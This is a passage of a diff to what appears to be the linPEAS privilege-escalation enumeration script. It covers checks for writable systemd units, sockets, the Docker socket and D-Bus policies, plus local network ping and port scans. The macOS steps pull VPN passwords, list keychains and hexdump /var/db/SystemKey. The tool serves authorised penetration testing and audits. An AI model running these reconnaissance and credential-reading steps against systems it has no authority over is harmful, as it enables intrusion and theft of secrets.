"s,writable.*,${SED_RED},g" - fi done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi #done - done - echo "" + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done + #TODO: identify allows in context="default" done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" fi - echo "" +done +else echo_not_found "busctl" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) +if echo $CHECKS | grep -q network_information; +print_title "Network Information" +########################################### +#---------) Network Information (---------# +########################################### - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" +#-- NI) /etc/inetd.conf +print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" +(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" +echo "" - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null +#-- NI) Neighbours +print_2title "Networks and neighbours" +if [ "$MACOS" ]; then + netstat -rn 2>/dev/null +else + (route || ip n || cat /proc/net/route) 2>/dev/null +fi +(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +print_2title "Iptables rules" +(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" +echo "" + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports echo "" - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + print_2title "VLANs" + networksetup -listVLANs echo "" - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi echo "" - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" + print_2title "Scanning local networks (using /24)" - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi + if ! [ "$PING" ] && ![ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" fi - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null echo "" - fi - done - fi + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," echo "" - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType echo "" - 